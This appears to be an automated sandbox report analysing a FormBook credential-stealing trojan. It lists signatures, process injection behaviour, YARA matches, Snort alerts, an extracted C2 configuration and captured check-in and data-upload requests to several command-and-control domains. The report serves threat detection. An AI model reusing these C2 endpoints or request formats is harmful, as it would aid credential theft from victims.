Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Lc8xQv8iZY.exe

Overview

General Information

Sample Name:Lc8xQv8iZY.exe
Analysis ID:756323
MD5:30571d64c9a9ed267159fa941a20840c
SHA1:bfb81d8a7c94781b3bd939bd17d500ae61b2ff70
SHA256:85d6c9eac93fb8818d37dc15110ebd060b3e9df48043ee6bcf349df6aed047c5
Tags:32exeFormbooktrojan
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to read the clipboard data
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • Lc8xQv8iZY.exe (PID: 3376 cmdline: C:\Users\user\Desktop\Lc8xQv8iZY.exe MD5: 30571D64C9A9ED267159FA941A20840C)
    • hvbvmxm.exe (PID: 3052 cmdline: "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h MD5: 1EEBBBD92B2C0C60F896FF8DCBCEDCAA)
      • conhost.exe (PID: 3748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • hvbvmxm.exe (PID: 5420 cmdline: "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h MD5: 1EEBBBD92B2C0C60F896FF8DCBCEDCAA)
        • explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • help.exe (PID: 1900 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.brennancorps.info/henz/"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x6611:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1f070:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa8bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x17df7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x17bf5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x176a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x17cf7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x17e6f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa48a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x168ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1dde7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1edda:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x1a0e9:$sqlite3step: 68 34 1C 7B E1
    • 0x1ac61:$sqlite3step: 68 34 1C 7B E1
    • 0x1a12b:$sqlite3text: 68 38 2A 90 C5
    • 0x1aca6:$sqlite3text: 68 38 2A 90 C5
    • 0x1a142:$sqlite3blob: 68 53 D8 7F 8C
    • 0x1acbc:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 29 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.hvbvmxm.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.hvbvmxm.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x6f48:$a1: 3C 30 50 4F 53 54 74 09 40
        • 0x1f9a7:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xb1f6:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1872e:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        3.2.hvbvmxm.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x1852c:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x17fd8:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x1862e:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x187a6:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xadc1:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x17223:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1e71e:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1f711:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.hvbvmxm.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x1aa20:$sqlite3step: 68 34 1C 7B E1
        • 0x1b598:$sqlite3step: 68 34 1C 7B E1
        • 0x1aa62:$sqlite3text: 68 38 2A 90 C5
        • 0x1b5dd:$sqlite3text: 68 38 2A 90 C5
        • 0x1aa79:$sqlite3blob: 68 53 D8 7F 8C
        • 0x1b5f3:$sqlite3blob: 68 53 D8 7F 8C
        3.2.hvbvmxm.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          Click to see the 3 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.4162.214.129.14949699802031453 11/30/22-01:25:33.429382
          SID:2031453
          Source Port:49699
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4162.214.129.14949699802031412 11/30/22-01:25:33.429382
          SID:2031412
          Source Port:49699
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4206.233.197.13549697802031453 11/30/22-01:25:25.388400
          SID:2031453
          Source Port:49697
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4206.233.197.13549697802031412 11/30/22-01:25:25.388400
          SID:2031412
          Source Port:49697
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4162.214.129.14949699802031449 11/30/22-01:25:33.429382
          SID:2031449
          Source Port:49699
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.4206.233.197.13549697802031449 11/30/22-01:25:25.388400
          SID:2031449
          Source Port:49697
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: Lc8xQv8iZY.exeReversingLabs: Detection: 48%
          Source: Lc8xQv8iZY.exeVirustotal: Detection: 47%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.lopezmodeling.com/henz/?4hq=dpH6BKfQQ0cm5Imeo72RAP4DEbjLNfLp0vSyI4bn1RZjePkdeS9augOMgWVykt+ztx1R3MJW/gsn5nuFARzMtUktTfqb4tJ3+A==&o8=wR-h28GxgAvira URL Cloud: Label: malware
          Source: http://www.eufidelizo.com/henz/?4hq=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0flOUm4qON1Jqzg==&o8=wR-h28GxgAvira URL Cloud: Label: malware
          Source: http://www.brennancorps.info/henz/?4hq=P4ST2IJPckjMYpRf2FLdq0axEROKy7OOggEf6mHPhnME1yGBMW0egmkxYDI06dmXm7z7OVgXWzJ+YqSrULYkiycbwQA+qKMVmQ==&o8=wR-h28GxgAvira URL Cloud: Label: malware
          Source: http://www.lopezmodeling.com/henz/Avira URL Cloud: Label: malware
          Source: http://www.brennancorps.info/henz/Avira URL Cloud: Label: malware
          Source: www.brennancorps.info/henz/Avira URL Cloud: Label: malware
          Source: http://www.lyonfinancialusa.com/henz/Avira URL Cloud: Label: malware
          Source: http://www.afterdarksocial.club/henz/Avira URL Cloud: Label: malware
          Source: http://www.foxwhistle.com/henz/Avira URL Cloud: Label: malware
          Source: http://www.patrickguarte.com/henz/Avira URL Cloud: Label: malware
          Source: http://www.patrickguarte.com/henz/?4hq=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYcUTUl/8YIp7EDwQ==&o8=wR-h28GxgAvira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URL
          Source: eufidelizo.comVirustotal: Detection: 8%Perma Link
          Source: www.eufidelizo.comVirustotal: Detection: 6%Perma Link
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeReversingLabs: Detection: 53%
          Machine Learning detection for sample
          Source: Lc8xQv8iZY.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeJoe Sandbox ML: detected
          Source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.brennancorps.info/henz/"]}
          Source: Lc8xQv8iZY.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: Binary string: wntdll.pdbUGP source: hvbvmxm.exe, 00000001.00000003.304073189.0000000002740000.00000004.00001000.00020000.00000000.sdmp, hvbvmxm.exe, 00000001.00000003.303031511.00000000028D0000.00000004.00001000.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000003.310467881.00000000008FC000.00000004.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.387087600.0000000000BAF000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000003.308974263.0000000000757000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.385661856.0000000000563000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000002.569002403.000000000320F000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.387371533.0000000000700000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: hvbvmxm.exe, hvbvmxm.exe, 00000003.00000003.310467881.00000000008FC000.00000004.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.387087600.0000000000BAF000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000002.386259883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, hvbvmxm.exe, 00000003.00000003.308974263.0000000000757000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.385661856.0000000000563000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000002.569002403.000000000320F000.00000040.00000800.00020000.00000000.sdmp, help.exe, 00000005.00000003.387371533.0000000000700000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeCode function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405620
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeCode function: 0_2_00405FF6 FindFirstFileA,FindClose,0_2_00405FF6
          Source: C:\Users\user\Desktop\Lc8xQv8iZY.exeCode function: 0_2_00402654 FindFirstFileA,0_2_00402654
          Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exeCode function: 1_2_00410370 FindFirstFileExW,1_2_00410370

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.patrickguarte.com
          Source: C:\Windows\explorer.exeNetwork Connect: 155.159.61.221 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.eufidelizo.com
          Source: C:\Windows\explorer.exeNetwork Connect: 192.185.35.86 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.lyonfinancialusa.com
          Source: C:\Windows\explorer.exeDomain query: www.afterdarksocial.club
          Source: C:\Windows\explorer.exeDomain query: www.lopezmodeling.com
          Source: C:\Windows\explorer.exeNetwork Connect: 192.185.217.47 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 206.233.197.135 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 154.22.100.62 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 162.214.129.149 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.foxwhistle.com
          Source: C:\Windows\explorer.exeNetwork Connect: 2.57.90.16 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.brennancorps.info
          Source: C:\Windows\explorer.exeDomain query: www.19t221013d.tokyo
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49697 -> 206.233.197.135:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49697 -> 206.233.197.135:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49697 -> 206.233.197.135:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49699 -> 162.214.129.149:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49699 -> 162.214.129.149:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49699 -> 162.214.129.149:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.brennancorps.info/henz/
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=wcp3urA+/rGtUuNVdXHur6CaD7Rg4XGXlvUWG7FdGjeYGPzd5j/g1Govvww0i9Uvwfj8E4D4P4OVv2O692M0flOUm4qON1Jqzg==&o8=wR-h28Gxg HTTP/1.1Host: www.eufidelizo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=I97X75yj3reE70KD0jnZLHprtk7Ny9G/KKFZ2xPoakAfOE75REIszhxIs75pfZv/CVEdhBuwKxvuqF4TRlzEsULWUGP1g0EPzg==&o8=wR-h28Gxg HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=8TptbrIX6F4NxrWdTDNRTBReo0fMEuELv5cUeaX5N5UPFd9Hxy/eTVHt8QapNK2qZdoBzpjQ3MhBnX7XpU/EbwlnLs/kdjkkcQ==&o8=wR-h28Gxg HTTP/1.1Host: www.afterdarksocial.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYcUTUl/8YIp7EDwQ==&o8=wR-h28Gxg HTTP/1.1Host: www.patrickguarte.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=P4ST2IJPckjMYpRf2FLdq0axEROKy7OOggEf6mHPhnME1yGBMW0egmkxYDI06dmXm7z7OVgXWzJ+YqSrULYkiycbwQA+qKMVmQ==&o8=wR-h28Gxg HTTP/1.1Host: www.brennancorps.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=dpH6BKfQQ0cm5Imeo72RAP4DEbjLNfLp0vSyI4bn1RZjePkdeS9augOMgWVykt+ztx1R3MJW/gsn5nuFARzMtUktTfqb4tJ3+A==&o8=wR-h28Gxg HTTP/1.1Host: www.lopezmodeling.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /henz/?4hq=jIhXpQA4pSG2yYWBb37zpp/PG+nmQ9F5uiLrR0YNz1ez7r/FQUV2GqKIrgsyQUbvld7C5UuQUlYsY6nmozac85OtAKDr0AUC2A==&o8=wR-h28Gxg HTTP/1.1Host: www.foxwhistle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 192.185.217.47 192.185.217.47
          Source: global trafficHTTP traffic detected: POST /henz/ HTTP/1.1Host: www.lyonfinancialusa.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.lyonfinancialusa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lyonfinancialusa.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 46 5f 54 33 34 4d 43 59 37 4c 4c 6c 35 30 36 46 70 55 6d 45 4c 6d 56 30 6d 31 6d 41 7e 59 47 31 45 72 5a 72 7a 51 72 43 4f 57 4d 4c 57 30 50 39 66 6d 38 71 30 51 56 44 6d 5a 39 4b 58 4c 58 59 43 47 67 65 67 44 28 54 4b 77 71 30 79 6a 6f 58 48 68 65 62 75 32 37 65 5a 42 62 45 69 45 6b 62 33 42 53 6a 35 64 4f 6e 57 42 38 78 4b 44 71 48 63 52 32 4b 48 38 32 37 68 43 41 6c 51 79 65 4e 57 59 50 55 32 4c 59 59 6e 75 74 6f 58 35 49 43 7a 65 73 58 73 41 4b 7a 4d 4c 79 53 41 5f 6b 2d 4b 4d 30 4f 32 5f 38 30 57 4c 61 6b 52 4f 65 51 4c 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hq=F_T34MCY7LLl506FpUmELmV0m1mA~YG1ErZrzQrCOWMLW0P9fm8q0QVDmZ9KXLXYCGgegD(TKwq0yjoXHhebu27eZBbEiEkb3BSj5dOnWB8xKDqHcR2KH827hCAlQyeNWYPU2LYYnutoX5ICzesXsAKzMLySA_k-KM0O2_80WLakROeQLw).
          Source: global trafficHTTP traffic detected: POST /henz/ HTTP/1.1Host: www.afterdarksocial.clubConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.afterdarksocial.clubUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.afterdarksocial.club/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 78 52 42 4e 59 66 6f 55 79 47 73 48 35 70 57 58 50 6b 34 67 55 52 30 62 31 78 47 6c 43 71 63 4a 6e 59 6f 75 65 4c 76 44 52 72 55 33 4c 74 52 78 78 42 4f 4b 54 58 37 56 68 44 53 6c 43 70 65 6a 56 38 35 48 73 5a 4b 50 31 65 30 39 69 47 6e 2d 6f 31 4c 7a 5a 54 4e 45 43 76 72 32 5a 51 63 57 66 59 35 34 36 45 77 73 4f 4d 41 54 43 73 4d 74 53 42 49 37 47 4f 4a 51 66 32 30 47 45 70 37 30 66 39 31 5f 75 6d 4e 79 4e 75 31 32 74 77 56 64 37 5a 42 4f 4f 71 62 36 35 79 43 5f 53 4c 32 6a 4d 79 37 32 35 65 52 55 37 4f 77 73 68 47 53 56 63 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hq=xRBNYfoUyGsH5pWXPk4gUR0b1xGlCqcJnYoueLvDRrU3LtRxxBOKTX7VhDSlCpejV85HsZKP1e09iGn-o1LzZTNECvr2ZQcWfY546EwsOMATCsMtSBI7GOJQf20GEp70f91_umNyNu12twVd7ZBOOqb65yC_SL2jMy725eRU7OwshGSVcA).
          Source: global trafficHTTP traffic detected: POST /henz/ HTTP/1.1Host: www.patrickguarte.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.patrickguarte.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.patrickguarte.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 30 72 56 75 73 4f 28 4a 6e 64 6d 42 33 79 67 33 33 31 6c 64 33 47 58 57 33 64 4a 4e 62 61 42 51 37 6e 44 43 46 6b 6d 33 43 67 48 48 37 53 4d 36 72 76 75 47 67 41 5a 47 68 32 57 50 62 49 58 34 56 56 72 4b 4f 62 34 41 51 6f 41 65 31 38 75 43 6e 67 55 4a 57 52 4a 34 28 75 4d 75 76 4c 64 48 79 56 4a 38 50 6c 4b 54 30 4b 6c 59 70 47 46 38 6c 5f 30 42 45 76 4e 37 78 77 7a 4c 6c 5f 4f 6b 72 45 32 69 66 6e 64 45 6b 6c 55 52 5a 57 34 74 65 6b 4e 33 67 53 6d 47 61 63 31 43 47 36 33 69 6e 33 53 33 41 36 71 70 49 52 49 44 4e 46 7e 47 49 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hq=0rVusO(JndmB3yg331ld3GXW3dJNbaBQ7nDCFkm3CgHH7SM6rvuGgAZGh2WPbIX4VVrKOb4AQoAe18uCngUJWRJ4(uMuvLdHyVJ8PlKT0KlYpGF8l_0BEvN7xwzLl_OkrE2ifndEklURZW4tekN3gSmGac1CG63in3S3A6qpIRIDNF~GIA).
          Source: global trafficHTTP traffic detected: POST /henz/ HTTP/1.1Host: www.brennancorps.infoConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.brennancorps.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.brennancorps.info/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 43 36 36 7a 31 2d 46 33 50 30 6d 6f 65 62 4e 7a 7e 51 71 50 73 58 72 32 61 6b 65 42 31 62 43 41 6e 53 55 34 33 45 57 56 36 47 38 51 75 69 53 77 4b 78 55 5a 6d 32 77 6a 55 6a 77 6b 7a 66 75 54 6e 37 57 47 44 32 64 6d 59 52 64 38 52 4a 6a 62 62 50 55 4e 6b 69 49 58 75 42 41 6c 68 39 74 51 6c 72 42 51 56 52 4c 62 6e 50 6f 79 46 49 65 43 56 69 73 32 79 4d 59 73 55 32 49 66 73 4b 69 4b 66 63 31 64 35 65 4e 5f 61 39 53 2d 44 4c 72 4a 54 30 77 6f 41 6a 42 53 51 4a 37 68 6c 41 56 34 61 4f 37 69 65 4e 44 32 59 71 6a 41 33 6d 47 31 67 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hq=C66z1-F3P0moebNz~QqPsXr2akeB1bCAnSU43EWV6G8QuiSwKxUZm2wjUjwkzfuTn7WGD2dmYRd8RJjbbPUNkiIXuBAlh9tQlrBQVRLbnPoyFIeCVis2yMYsU2IfsKiKfc1d5eN_a9S-DLrJT0woAjBSQJ7hlAV4aO7ieND2YqjA3mG1gw).
          Source: global trafficHTTP traffic detected: POST /henz/ HTTP/1.1Host: www.lopezmodeling.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.lopezmodeling.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lopezmodeling.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 51 72 76 61 43 39 61 69 56 32 4d 36 28 65 75 56 73 50 58 43 4c 75 38 51 48 75 32 52 48 34 28 72 32 39 32 74 4c 61 4b 33 32 77 6c 51 64 76 38 44 4f 6c 41 63 6c 6a 36 4d 38 45 6c 32 6a 75 71 59 6d 43 45 51 35 74 45 6a 39 53 49 6a 68 57 4f 46 43 30 54 36 70 68 55 78 63 59 75 64 78 2d 39 56 7e 4f 44 72 35 53 4e 52 6c 67 65 7a 51 66 28 65 6e 68 7a 75 54 34 42 5a 73 30 49 31 37 7a 73 43 70 68 6b 45 74 7a 70 4b 31 36 71 54 41 37 61 6e 31 6e 74 55 54 6d 6b 34 54 37 72 41 41 35 35 4b 6b 45 78 45 73 59 4d 6e 64 7a 51 78 7a 44 7e 4f 52 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 4hq=QrvaC9aiV2M6(euVsPXCLu8QHu2RH4(r292tLaK32wlQdv8DOlAclj6M8El2juqYmCEQ5tEj9SIjhWOFC0T6phUxcYudx-9V~ODr5SNRlgezQf(enhzuT4BZs0I17zsCphkEtzpK16qTA7an1ntUTmk4T7rAA55KkExEsYMndzQxzD~ORw).
          Source: global trafficHTTP traffic detected: POST /henz/ HTTP/1.1Host: www.foxwhistle.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.foxwhistle.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.foxwhistle.com/henz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 34 68 71 3d 75 4b 4a 33 71 67 6f 51 6a 53 53 49 6c 37 32 53 57 52 62 78 6d 4a 66 79 62 2d 43 48 5a 61 64 44 71 46 6a 78 48 58 77 39 33 69 43 66 6a 62 65 45 52 54 39 32 4c 59 53 45 33 41 4d 38 63 33 61 5a 67 38 43 4b 6d 47 6a 6a 44 46 31 39 43 71 33 69 35 31 36 62 34 4c 61 63 41 5a 4c 31 77 7a 45 78 77 70 79 56 48 52 6b 62 4f 53 7e 71 41 33 58 61 4a 37 6b 37 62 74 6d 45 4b 38 6e 45 35 33 74 6f 56 37 6c 56 72 36 